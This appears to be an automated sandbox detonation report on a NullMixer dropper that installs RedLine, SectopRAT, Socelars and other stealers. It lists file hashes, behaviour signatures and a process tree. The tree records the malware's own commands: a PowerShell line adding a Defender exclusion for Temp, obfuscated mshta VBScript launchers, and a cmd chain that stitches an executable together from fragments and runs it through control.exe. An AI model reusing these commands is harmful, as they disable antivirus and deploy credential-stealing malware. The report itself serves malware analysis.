| MD5 | 4a01f3a6efccd47150a97d7490fd8628 |
| SHA1 | 284af830ac0e558607a6a34cf6e4f6edc263aee1 |
| SHA256 | e29476ee4544a426c1518728034242be3e6821f79378ae2faffedecc194c5a97 |
| SHA512 | 4d0e886e3227f09c177f1a9836ee65766aafc7f48458c944da1afc061106dfbbf47455e54065d22de955b44044817ac900ee9ac80b434ad73bf53262acb49519 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun075246a0bffeab.exe
| MD5 | 118cf2a718ebcf02996fa9ec92966386 |
| SHA1 | f0214ecdcb536fe5cce74f405a698c1f8b2f2325 |
| SHA256 | 7047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d |
| SHA512 | fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07be2debb1a.exe
| MD5 | 7908fc00709580c4e12534bcd7ef8aae |
| SHA1 | 616616595f65c8fdaf1c5f24a4569e6af04e898f |
| SHA256 | 55fc7e624b75a66d04ed1dfc8d6957ceb013db94e9be29e779280378011d1399 |
| SHA512 | 0d5a72410d628d3bf6ff9188a69f378e04184ed603a620659f4084bd8a5a392577849c5aa895706eec5213b0036d24faafb8e153b458b5f53d8da7ce636b7a00 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07e3a022a8656c5ca.exe
| MD5 | b7ed5241d23ac01a2e531791d5130ca2 |
| SHA1 | 49df6413239d15e9464ed4d0d62e3d62064a45e9 |
| SHA256 | 98ac9097e514852804ca276aac3a319b07acf7219aef34e0d4fff6ea5b094436 |
| SHA512 | 1e4402c695a848bd62f172bd91eb3a4df8067c1fbc5f95dfd601d7a8c24ad81ac2e1f2e1280160087da8c8fbb72e957259661d759d8f7d9317cef3c64429a126 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0752b359bd184a.exe
| MD5 | aee0df0b273236965ad033c9a4be275f |
| SHA1 | ac8124f037441434c9881a2649e2e62bf276b1a6 |
| SHA256 | 622752355b43c5c019c6242b40c93288006b61fea2039d467bff1ac9c7e4dd85 |
| SHA512 | 759013680b6019d2783aabc1313bd949c564b7a8ecd267b626a9011963c0622dccfe3853f30df3c5d4434683adcf08372305abfae974692ed5cbc2d55842567f |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0741b6b6c3.exe
| MD5 | f75e29fdd8803d46736be53a119c0814 |
| SHA1 | e75af0dd2e15043e49684e599bd76f037abbee64 |
| SHA256 | fe9cac8ff86d68feb4e76f8bc04c345e767353feed2a5fe8c98cc9a42b8739af |
| SHA512 | 223587ca8c9974976f07a683607cabf9e6414878121be48a4831ce7b5c2bbde7dcfc3dd6454999c135952fddc307d99b47c008a5417d3ab91b58775a6dc92b12 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0750d1e499.exe
| MD5 | 725101e70fc2007633fca44a6129d46c |
| SHA1 | cd4806d4b7889bf86e80b60e207fd78b32c8c841 |
| SHA256 | 7d7b882da2072450c3924d2b0cbc22e74d4155e8db6a9a14d4932ca5dadf8967 |
| SHA512 | 72c23216429adb6ee0ac52224ace136acedb5f7d4af9dac2bb557cda1843e5239480b97e4be86abc9654e8a273a3f69af36c7dd0500efd247ab3b0b678e7194d |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07dc9d2dae027.exe
| MD5 | 69f0fe993f6e63c9e7a2b739ec956e82 |
| SHA1 | 6f9a1b7a9fceac26722da17e204f57a47d7b66a5 |
| SHA256 | ee4355899a94ed5b369d8a8851d52ef2286c01af577e70bc82f43a5f4716fb0b |
| SHA512 | 1f81e0b8c3a5748a2aa47e02f8b1c1fc09e8d81871a607a148343ac3c579b82685f41eddf2070976a31aabccef0e70303c05d30e0c78c287a5c478c886185b1a |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe
| MD5 | 0f1ef1bad121bd626d293df70f9c73f8 |
| SHA1 | 790d44990c576d1da37e535a447dc6b7270b4ca2 |
| SHA256 | 327e9994d62d8a1042f96db61359c9258ebc9c703f9a536801da79b196c221d3 |
| SHA512 | b626ccadfd53383a1f18d4604b4adac6ac5a0bd010089be26dd026e4a44f565813cff3711cc9343c9112a6cbcdcff208d209fba9e94f1103746e50af83be171b |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
memory/2412-143-0x0000000000C60000-0x0000000000C68000-memory.dmp
memory/1976-144-0x00000000003F0000-0x0000000000406000-memory.dmp
memory/924-145-0x0000000000B90000-0x0000000000C02000-memory.dmp
memory/1976-148-0x00000000002C0000-0x00000000002C6000-memory.dmp
memory/516-152-0x00000000017B0000-0x00000000017D4000-memory.dmp
memory/516-169-0x00000000017E0000-0x0000000001802000-memory.dmp
memory/992-180-0x0000000002330000-0x000000000247C000-memory.dmp
memory/2788-189-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2788-188-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2788-187-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2788-185-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2788-182-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2788-181-0x0000000000400000-0x000000000051C000-memory.dmp
memory/2720-205-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2720-203-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2720-202-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2720-201-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2720-199-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2720-197-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2720-195-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2720-193-0x0000000000400000-0x0000000000422000-memory.dmp
memory/516-207-0x0000000000400000-0x00000000016E0000-memory.dmp
memory/1004-206-0x0000000000400000-0x00000000016C7000-memory.dmp
memory/2324-208-0x0000000000400000-0x00000000016E0000-memory.dmp
memory/992-210-0x0000000002330000-0x000000000247C000-memory.dmp
memory/992-211-0x0000000000BA0000-0x0000000000C45000-memory.dmp
memory/992-215-0x00000000027E0000-0x0000000002872000-memory.dmp
memory/992-212-0x00000000027E0000-0x0000000002872000-memory.dmp
memory/992-216-0x00000000027E0000-0x0000000002872000-memory.dmp
memory/1704-217-0x0000000000A90000-0x0000000000BDC000-memory.dmp
memory/2324-219-0x0000000000400000-0x00000000016E0000-memory.dmp
memory/1704-221-0x0000000002770000-0x0000000002815000-memory.dmp
memory/1704-222-0x0000000000A90000-0x0000000000BDC000-memory.dmp
memory/1704-223-0x0000000000730000-0x00000000007C2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-22 09:57
Reported
2024-11-22 09:59
Platform
win10v2004-20241007-en
Max time kernel
119s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07cad998fb20a18.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07be2debb1a.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2456 set thread context of 1892 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0794d0eebce1.exe | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0794d0eebce1.exe |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun075246a0bffeab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07e3a022a8656c5ca.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07778dd9fc6d53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0741b6b6c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07be2debb1a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0752b359bd184a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07cad998fb20a18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0741b6b6c3.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0741b6b6c3.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0741b6b6c3.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133767431098887220" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0752b359bd184a.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe
"C:\Users\Admin\AppData\Local\Temp\28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0741b6b6c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0752b359bd184a.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07be2debb1a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07e3a022a8656c5ca.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun075246a0bffeab.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07778dd9fc6d53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07fcb30681127.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07dc9d2dae027.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0750d1e499.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0794d0eebce1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07cad998fb20a18.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07cad998fb20a18.exe
Sun07cad998fb20a18.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0794d0eebce1.exe
Sun0794d0eebce1.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0741b6b6c3.exe
Sun0741b6b6c3.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0750d1e499.exe
Sun0750d1e499.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07fcb30681127.exe
Sun07fcb30681127.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07be2debb1a.exe
Sun07be2debb1a.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0752b359bd184a.exe
Sun0752b359bd184a.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07dc9d2dae027.exe
Sun07dc9d2dae027.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun075246a0bffeab.exe
Sun075246a0bffeab.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07778dd9fc6d53.exe
Sun07778dd9fc6d53.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07e3a022a8656c5ca.exe
Sun07e3a022a8656c5ca.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1124 -ip 1124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1124 -s 580
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07cad998fb20a18.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07cad998fb20a18.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4512 -ip 4512
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0794d0eebce1.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0794d0eebce1.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 356
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07cad998fb20a18.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07cad998fb20a18.exe") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sun07cad998fb20a18.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2720 -ip 2720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 620
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2720 -ip 2720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2720 -ip 2720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 636
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
